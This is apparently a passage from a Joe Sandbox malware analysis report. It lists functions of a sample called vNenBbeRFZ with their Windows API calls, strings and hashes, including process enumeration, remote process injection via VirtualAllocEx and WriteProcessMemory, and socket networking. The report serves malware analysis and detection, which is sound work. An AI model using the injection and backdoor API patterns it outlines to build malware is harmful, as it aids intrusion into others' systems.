Function 004017AC Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 26sleepCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004017BB
Sleep.KERNELBASE ref: 004017C9

Part of subcall function 00401700: CreateFileA.KERNELBASE ref: 0040174D
Part of subcall function 00401700: ReadFile.KERNELBASE ref: 0040177D
Part of subcall function 00401700: CloseHandle.KERNEL32 ref: 0040178D

Strings

(0@, xrefs: 004017ED

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: File$CloseCreateHandleReadSleepmalloc
String ID: (0@
API String ID: 4248373497-1619376425
Opcode ID: 6d237690192b1ace06ef53b017fefc863e99b8ac6f99966421df6b42d048f78f
Instruction ID: c5ff9b23b782a152e9078f53391313f88ce60a5e5a6f56c576f8ee03e9b1b560
Opcode Fuzzy Hash: 6d237690192b1ace06ef53b017fefc863e99b8ac6f99966421df6b42d048f78f
Instruction Fuzzy Hash: E7F0F8B4A053009BC700EF7ADA8551ABBE8BB08345F41483DA685E7391D678D9008B1A

Function 03D77C45 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03D777BE: htonl.WS2_32(?), ref: 03D777F8
Part of subcall function 03D777BE: select.WS2_32(00000000,?,?,?,?), ref: 03D7785C
Part of subcall function 03D777BE: __WSAFDIsSet.WS2_32(00000000,?), ref: 03D77878
Part of subcall function 03D777BE: accept.WS2_32(00000000,00000000,00000000), ref: 03D7788D
Part of subcall function 03D777BE: ioctlsocket.WS2_32(00000000,8004667E,?), ref: 03D778A0

GetTickCount.KERNEL32 ref: 03D77C53

Part of subcall function 03D77AF5: _malloc.LIBCMT ref: 03D77B19
Part of subcall function 03D77AF5: htonl.WS2_32(?), ref: 03D77B45
Part of subcall function 03D77AF5: recvfrom.WS2_32(00000000,?,000FFFFC,00000000,000000FF,?), ref: 03D77B74
Part of subcall function 03D77AF5: WSAGetLastError.WS2_32 ref: 03D77B7F

GetTickCount.KERNEL32 ref: 03D77C66

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CountTickhtonl$ErrorLast_mallocacceptioctlsocketrecvfromselect
String ID:
API String ID: 597769433-0
Opcode ID: c179c5f7821acd7df3bcd6ce0fbdc89db53926348a58913f1ba13e30868f59f1
Instruction ID: 4b305a86890c6bf9b5b37fd8bb276f211eb069af86c622ba63347076b966c4fd
Opcode Fuzzy Hash: c179c5f7821acd7df3bcd6ce0fbdc89db53926348a58913f1ba13e30868f59f1
Instruction Fuzzy Hash: 3FD0C91AB1132401A511B3B99C855BE469ADA8A4B1B390C37E418DA314FE95A94217B2

Function 03D7DEDE Relevance: 1.8, APIs: 1, Instructions: 257COMMONLIBRARYCODE

Download Yara Rule

APIs

_calloc.LIBCMT ref: 03D7DF40

Part of subcall function 03D93A30: __calloc_impl.LIBCMT ref: 03D93A45

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __calloc_impl_calloc
String ID:
API String ID: 2108883976-0
Opcode ID: 93149bd949b0d6bfc7a5b3000a3da619d9b8fde754d4fa280a45f9525d759caa
Instruction ID: 3bd8147546b0d570e3167938ea38a357b6486175587213751ad65d9e37d08d1f
Opcode Fuzzy Hash: 93149bd949b0d6bfc7a5b3000a3da619d9b8fde754d4fa280a45f9525d759caa
Instruction Fuzzy Hash: 54A148B5900208EFDF21DF94CC45FAEBBBAFF89700F104199E541AA250E7729A54DF60

Function 03D810FF Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D81106

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: af2625f3d99b1f377257fd306f1ba65c0c70bdff3be649f0c97eb7f164a9f832
Instruction ID: d7e35b284ea0a1d1e92fad19ba0683181e7f5650654429008bfd71caaa806ae1
Opcode Fuzzy Hash: af2625f3d99b1f377257fd306f1ba65c0c70bdff3be649f0c97eb7f164a9f832
Instruction Fuzzy Hash: 64E01A722086014FD768DF28F841A06B7E1AB85620B24CE7ED0AAC7284D634A4864A18

Function 03D874C3 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,03D871FF,00000001,?,?,?,03D87378,?,?,?,03DA0728,0000000C,03D87433), ref: 03D874D8

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 7561b6f3f2c30a6fdb8b055df152fd63b24a0c53d88be68a0bd728e0e5c6f8f1
Instruction ID: 7b1469a06a4f354a2a5fcc297b8b566755404500cb0bc35220483a76aace2dda
Opcode Fuzzy Hash: 7561b6f3f2c30a6fdb8b055df152fd63b24a0c53d88be68a0bd728e0e5c6f8f1
Instruction Fuzzy Hash: 98D05E33550705AEDB10BFB479097223BDC93847A5F188436B84CC6684F674D6409504

Function 0397934F Relevance: 1.3, APIs: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,039788C7,?,039788C7,AAAABBBB), ref: 0397943E

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 06db9e082881e3a7de2518e710500035fed678b226e83921418e753830c2cfca
Instruction ID: 2b5c4bda2df4a98c34d5dfaadab192b30e91b90f2b0e99728234371037884056
Opcode Fuzzy Hash: 06db9e082881e3a7de2518e710500035fed678b226e83921418e753830c2cfca
Instruction Fuzzy Hash: F531BA70A00509AFCB08CF99D894AAEB7B5FF88754F14C199E919AB394D730AA51CF90

Function 03D74A3E Relevance: 1.3, APIs: 1, Instructions: 31sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03D74AB7: htonl.WS2_32(03D9E534), ref: 03D74ADA

Sleep.KERNELBASE(?,0000EA60,?,03D7165F,0000EA60), ref: 03D74A99

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Sleephtonl
String ID:
API String ID: 4038527953-0
Opcode ID: 26bba3d82b63e0cbd665be41dc354a8ec33120826c942b79b5e88ee501439d2b
Instruction ID: 002e03223c3435901dd1c994f47a69a09138ddd9ef2416fab8f3e98c4d212941
Opcode Fuzzy Hash: 26bba3d82b63e0cbd665be41dc354a8ec33120826c942b79b5e88ee501439d2b
Instruction Fuzzy Hash: 0DF08C36900B069FDB13FF62ED06B2877B4FB08629F0C0125E80499358FB35C498DE2A

Function 004029E0 Relevance: 1.3, APIs: 1, Instructions: 14sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00401805: GetTickCount.KERNEL32 ref: 0040180B
Part of subcall function 00401805: sprintf.MSVCRT ref: 00401875
Part of subcall function 00401805: CreateThread.KERNELBASE ref: 004018A9

Sleep.KERNELBASE(?,00401386,?,0000165A,00401386), ref: 00402A09

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: CountCreateSleepThreadTicksprintf
String ID:
API String ID: 2384577035-0
Opcode ID: f7ed11f33e5ede3c24d32d7fb4024a17402d36c58d14aae0c6d80219a9c0d177
Instruction ID: a9666bfb936c183b19d5392f3579b61d4f188b929878c6305ba6d47d4f91b3a5
Opcode Fuzzy Hash: f7ed11f33e5ede3c24d32d7fb4024a17402d36c58d14aae0c6d80219a9c0d177
Instruction Fuzzy Hash: 99D05EB1408204AAC6003FA5C90AA1ABAA8AB04311F01063CF8C2291D1DF7910208B7B

Non-executed Functions

Function 03D747C9 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 172filetimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D747DB

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

_memset.LIBCMT ref: 03D747E7

Part of subcall function 03D71683: _malloc.LIBCMT ref: 03D71689

Part of subcall function 03D716D3: htonl.WS2_32(0000001F), ref: 03D716D9

_strncmp.LIBCMT ref: 03D74836
GetCurrentDirectoryA.KERNEL32(00004000,00000000), ref: 03D74844

Part of subcall function 03D857F0: __lock.LIBCMT ref: 03D8580E
Part of subcall function 03D857F0: ___sbh_find_block.LIBCMT ref: 03D85819
Part of subcall function 03D857F0: ___sbh_free_block.LIBCMT ref: 03D85828
Part of subcall function 03D857F0: HeapFree.KERNEL32(00000000,00000000,03DA05E8,0000000C,03D8A726,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C), ref: 03D85858
Part of subcall function 03D857F0: GetLastError.KERNEL32(?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE,00000000,00000000,?,03D8A7E0,0000000D), ref: 03D85869

FindFirstFileA.KERNEL32(00000000,?), ref: 03D74875
GetLastError.KERNEL32 ref: 03D74882
FileTimeToSystemTime.KERNEL32(?,00000000), ref: 03D748CE
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,00000000,?), ref: 03D748DE
FindNextFileA.KERNEL32(00000000,00000010), ref: 03D74971
FindClose.KERNEL32(00000000), ref: 03D74980

Part of subcall function 03D71726: _vwprintf.LIBCMT ref: 03D71730
Part of subcall function 03D71726: _vswprintf_s.LIBCMT ref: 03D71754

Strings

.\*, xrefs: 03D74830
%s, xrefs: 03D7485F
D0%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 03D74915
F%I64d%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 03D7495B

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Time$FileFind$ErrorHeapLastSystem_malloc$AllocateCloseCurrentDirectoryFirstFreeLocalNextSpecific___sbh_find_block___sbh_free_block__lock_memset_strncmp_vswprintf_s_vwprintfhtonl
String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
API String ID: 2804257087-1754256099
Opcode ID: c27feefcb19f912a8ed36ebe24ed5ad57faa8f1be1068c56e1c1af3fec46b7a5
Instruction ID: f3e405f4e4c61011d023af44fce4e1decbfd295f60ef7810e96243062018f04d
Opcode Fuzzy Hash: c27feefcb19f912a8ed36ebe24ed5ad57faa8f1be1068c56e1c1af3fec46b7a5
Instruction Fuzzy Hash: EA5139B6800229BADB10FBE5DC45EFFB7BCEF08A01F044526F615E6181FA3896548771

Function 03D78FCB Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 155processCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D78FED

Part of subcall function 03D71683: _malloc.LIBCMT ref: 03D71689

GetCurrentProcess.KERNEL32 ref: 03D79031
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03D79065
Process32First.KERNEL32(00000000,?), ref: 03D79087
CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 03D79091

Part of subcall function 03D716D3: htonl.WS2_32(0000001F), ref: 03D716D9

OpenProcess.KERNEL32(-00000400,00000000,?,00000002,00000000), ref: 03D790BE
ProcessIdToSessionId.KERNEL32(?,?), ref: 03D79113
CloseHandle.KERNEL32(00000000), ref: 03D79164
Process32Next.KERNEL32(00000000,00000128), ref: 03D7916E
CloseHandle.KERNEL32(00000000), ref: 03D7917C

Part of subcall function 03D78F5E: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,03D790FD,00000000,00000000), ref: 03D78F6B

Strings

x64, xrefs: 03D79042, 03D79050
x86, xrefs: 03D7912A, 03D7913E
%s%d%d%s%s%d, xrefs: 03D79155
%s%d%d, xrefs: 03D790E0

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Process$CloseHandle$OpenProcess32$CreateCurrentFirstNextSessionSnapshotTokenToolhelp32_malloc_memsethtonl
String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
API String ID: 1744962696-1833344708
Opcode ID: fb4100f172ec3e1cdf12f1c05dda03639a2d0afe6ecbe283e08ac14f661ce027
Instruction ID: d93435c397d5ec27ea5cedade34015d603da40b0ab2455c63643f3ba3a745914
Opcode Fuzzy Hash: fb4100f172ec3e1cdf12f1c05dda03639a2d0afe6ecbe283e08ac14f661ce027
Instruction Fuzzy Hash: 88516476800319AAEF21EBA4CC45FEF7BBCEF04754F000196E509E6180FB3596559B61

Function 03D791F0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 84fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D791FD

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

__snprintf.LIBCMT ref: 03D7920E
FindFirstFileA.KERNEL32(00000000,03D7466D,?,03D792DF,03D7466D,?,03D745F1), ref: 03D7921B

Part of subcall function 03D857F0: __lock.LIBCMT ref: 03D8580E
Part of subcall function 03D857F0: ___sbh_find_block.LIBCMT ref: 03D85819
Part of subcall function 03D857F0: ___sbh_free_block.LIBCMT ref: 03D85828
Part of subcall function 03D857F0: HeapFree.KERNEL32(00000000,00000000,03DA05E8,0000000C,03D8A726,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C), ref: 03D85858
Part of subcall function 03D857F0: GetLastError.KERNEL32(?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE,00000000,00000000,?,03D8A7E0,0000000D), ref: 03D85869

_malloc.LIBCMT ref: 03D7925A
__snprintf.LIBCMT ref: 03D7926F

Part of subcall function 03D791B3: _malloc.LIBCMT ref: 03D791BE
Part of subcall function 03D791B3: __snprintf.LIBCMT ref: 03D791D2

FindNextFileA.KERNEL32(000000FF,03D7466D,?,?,?,?,?,?,?), ref: 03D7929C
FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 03D792A9

Strings

%s\*, xrefs: 03D79207

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
String ID: %s\*
API String ID: 1254174322-766152087
Opcode ID: f59770b5b02944f6beedbe6cf57946d60d7f518709193f3caf394db98f8464b4
Instruction ID: 04f6de50b9e0090d743c6a678e5ad80e3b8392472674989b975b8d7750422476
Opcode Fuzzy Hash: f59770b5b02944f6beedbe6cf57946d60d7f518709193f3caf394db98f8464b4
Instruction Fuzzy Hash: D621C273500208BBEF20FF209C45EAF3B6EEF42661F588015FC086B251EB319E119BA1

Function 03D7411E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130processCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03D76F4C: _malloc.LIBCMT ref: 03D76F52
Part of subcall function 03D76F4C: _malloc.LIBCMT ref: 03D76F62

_memset.LIBCMT ref: 03D74181
GetStartupInfoA.KERNEL32(?), ref: 03D74199

Part of subcall function 03D72E99: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,03D7406E,00000400,?,03D73E93,03D7406E,?,00000400), ref: 03D72EAF
Part of subcall function 03D72E99: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,03D7406E,03D73E93,?,03D73E93,03D7406E,?,00000400,?,?,?,?,03D7406E), ref: 03D72EC8

GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 03D741FE
GetCurrentDirectoryW.KERNEL32(00000400,?), ref: 03D74208
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000001,00000000,00000000,00000000,00000000,00000000,?,03D72FA0), ref: 03D74233
GetLastError.KERNEL32 ref: 03D74242

Part of subcall function 03D724B5: _vswprintf_s.LIBCMT ref: 03D724D1

Strings

%s as %s\%s: %d, xrefs: 03D74252

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ByteCharCurrentDirectoryMultiWide_malloc$CreateErrorInfoLastLogonProcessStartupWith_memset_vswprintf_s
String ID: %s as %s\%s: %d
API String ID: 963358868-816037529
Opcode ID: 04eccba0a2f25ba311ffc378e46d85b8fc7205234897223f67ef9c82099825db
Instruction ID: 132bfc9b1f8d4f675aaddfaac69d80f0d79cb01d1113adad2dfdaf6d9fdb1bd4
Opcode Fuzzy Hash: 04eccba0a2f25ba311ffc378e46d85b8fc7205234897223f67ef9c82099825db
Instruction Fuzzy Hash: B7414876D00208BBDF11AFA6DC45EEFBFB9EF49710F100416F608AA160E6758A21DB61

Function 03D758D9 Relevance: 10.6, APIs: 7, Instructions: 97memoryinjectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,?,00000000,?,?,03D754C2,00000000,00000000), ref: 03D7590D
GetLastError.KERNEL32(?,03D754C2,00000000,00000000), ref: 03D75919
WriteProcessMemory.KERNEL32(00000000,03D754C2,03D754C2,?,00000000,?,03D754C2,00000000,00000000), ref: 03D7594E
VirtualProtectEx.KERNEL32(00000000,00000000,00000000,?,03D754C2,?,03D754C2,00000000,00000000), ref: 03D75994
GetLastError.KERNEL32(?,03D754C2,00000000,00000000), ref: 03D7599E
GetLastError.KERNEL32(?,00000000,?,03D754C2,00000000,00000000), ref: 03D759A9
VirtualFree.KERNEL32(00000000,00000000,00008000,?,03D754C2,00000000,00000000), ref: 03D759C1

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ErrorLastVirtual$AllocFreeMemoryProcessProtectWrite
String ID:
API String ID: 2897431253-0
Opcode ID: 3d78a602125191296aa4b5626ff6003528137aa549247606a3e44ecbab0ca4c6
Instruction ID: 918190187c39855111acafb8ff1368a2f968dda65c1fd3726c5dd500efce7038
Opcode Fuzzy Hash: 3d78a602125191296aa4b5626ff6003528137aa549247606a3e44ecbab0ca4c6
Instruction Fuzzy Hash: 4721AB7A600308BBEB10FBB5AD49FBE7B69EB42B51F144026FA04D9190F77089419772

Function 03D73303 Relevance: 9.1, APIs: 6, Instructions: 68sleepnetworkCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03D73315

Part of subcall function 03D72B61: WSAStartup.WS2_32(00000202,?), ref: 03D72B7F
Part of subcall function 03D72B61: WSACleanup.WS2_32 ref: 03D72B89

Sleep.KERNEL32(000003E8,?,?,?,00000001,?,?,00000000,?,?,00000000), ref: 03D73385
GetTickCount.KERNEL32 ref: 03D7338B
Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?,?,?,00000001,?,?,00000000,?,?,00000000), ref: 03D7339E
closesocket.WS2_32(00000000), ref: 03D733A5
send.WS2_32(00000000,00000000,?,00000000), ref: 03D733B8

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CountSleepTick$CleanupStartupclosesocketsend
String ID:
API String ID: 2410302135-0
Opcode ID: a3dc16258a6a854f812e04490617aafeacef811f16fbba3100e8e873e9d11ef5
Instruction ID: 09758856c4be0318801e9359c6f5abe3f1f1fe9ee656ccc99b6ea01af609ca2b
Opcode Fuzzy Hash: a3dc16258a6a854f812e04490617aafeacef811f16fbba3100e8e873e9d11ef5
Instruction Fuzzy Hash: D1115B7AD04318ABDF01FBF4DC859DEBB78EF08224F140927E211BA190FA35D6559BA1

Function 03D7733D Relevance: 9.1, APIs: 6, Instructions: 68networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 03D7735A
htons.WS2_32(?), ref: 03D7736A

Part of subcall function 03D72B61: WSAStartup.WS2_32(00000202,?), ref: 03D72B7F
Part of subcall function 03D72B61: WSACleanup.WS2_32 ref: 03D72B89

socket.WS2_32(00000002,00000002,00000000), ref: 03D77380
closesocket.WS2_32(00000000), ref: 03D7738D
bind.WS2_32(00000000,?,00000010), ref: 03D773BB
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 03D773D2

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

